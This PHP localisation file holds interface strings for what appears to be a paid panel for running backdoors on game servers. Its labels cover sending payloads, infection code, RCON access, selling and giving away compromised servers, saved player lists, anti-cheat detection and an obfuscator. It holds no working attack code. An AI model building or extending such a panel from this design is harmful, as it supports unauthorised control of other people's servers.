<?php

$lang = [
    "servers" => "Servers",
    "players" => "Players",
    "nb_player_off" => "Saved players",
    "requests" => "Numbers of requests",
    "buy" => "Buy",
    "user" => "User",
    "settings" => "Settings",
    "extra" => "Extras",
    "dashboard" => "Dashboard",
    "rules" => "Rules",
    "rules1" => "Don't send any URL of the login page/your backdoor ! ( Sanction : Deleting your account )",
    "rules2" => "Don't send your username and password to someone ! ( Sanction : Deleting your account )",
    "rules3" => "Don't show any vidéo/image of the website !",
    "rules4" => "Don't put your backooor in the workshop steam ! We are here to destroy illegal server !",
    "project" => "Project",
    "download" => "Download",
    "infectioncode" => "Infection Code",
    "users" => "Users",
    "offlineservers" => "Servers Offline",
    "sellservers" => "Servers on Sell",
    "playerslist" => "Players Lists",
    "players" => "Players",
    "adminisistration" => "information",
    "sendpayload" => "Send Payload",
    "giveservers" => "Give Servers",
    "ipaddress" => "IP Address",
    "serverpassword" => "Server Password",
    "rconpassword" => "Remote Console (RCON)",
    "gamemode" => "Gamemode",
    "map" => "Map of servers",
    "cac" => "Server have Cake Anti-Cheat (CAC)",
    "snte" => "Server have Say no to exploits (SNTE)",
    "lougout" => "Lougout",
    "lodpayload" => "Load Payload",
    "arguments" => "Arguments Mode",
    "argumentstext" => "Text Arguments",
    "argumenttofpayload" => "Argument of the payload",
    "cancel" => "Cancel",
    "reconnectwithrcon" => "Reconnect with RCON",
    "servername" => "Server Name",
    "lastpingdate" => "Last ping date",
    "warningofflineservermsg" => "⚠️ ATTENTIONS ! ⚠️ if you spam RCON reconnection the website can lag, so if we see you spamming RCON Recnnection, your account will be BAN/Deleted with no cash back ! ⚠️",
    "colorchange" => "Change panel color",
    "profilelogo" => "Change your profile image",
    "urlimage" => "URL of the image",
    "changepassword" => "Change password",
    "oldpassword" => "Old Password",
    "newpassword" => "New Password",
    "confirmpassword" => "Confirm Password",
    "changepassword" => "Change password",
    "waitserver" => "Wait from server responding...",
    "setcode" => "Set code",
    "vip1" => "Server Illimité",
    "vip2" => "Payloads Illimité",
    "vip3" => "Backdoor Finder",
    "vip4" => "Accès prioritaire support",
    "vip5" => "Dé/Obfusquateur",
    "vip6" => "Accès à Joueurs Enregistrés",
    "vip7" => "Accès à la V3",
    "vip8" => "Accès à Bêta",
    "vip9" => "+250 FREE CC",
    "net" => "You don't have enought Tokens !",
    "alreadyvip" => "You are already VIP !",
    "buysuccess" => "Successful purchase, You are now VIP !",
    "unablebuy" => "Already Purchased"


];

?>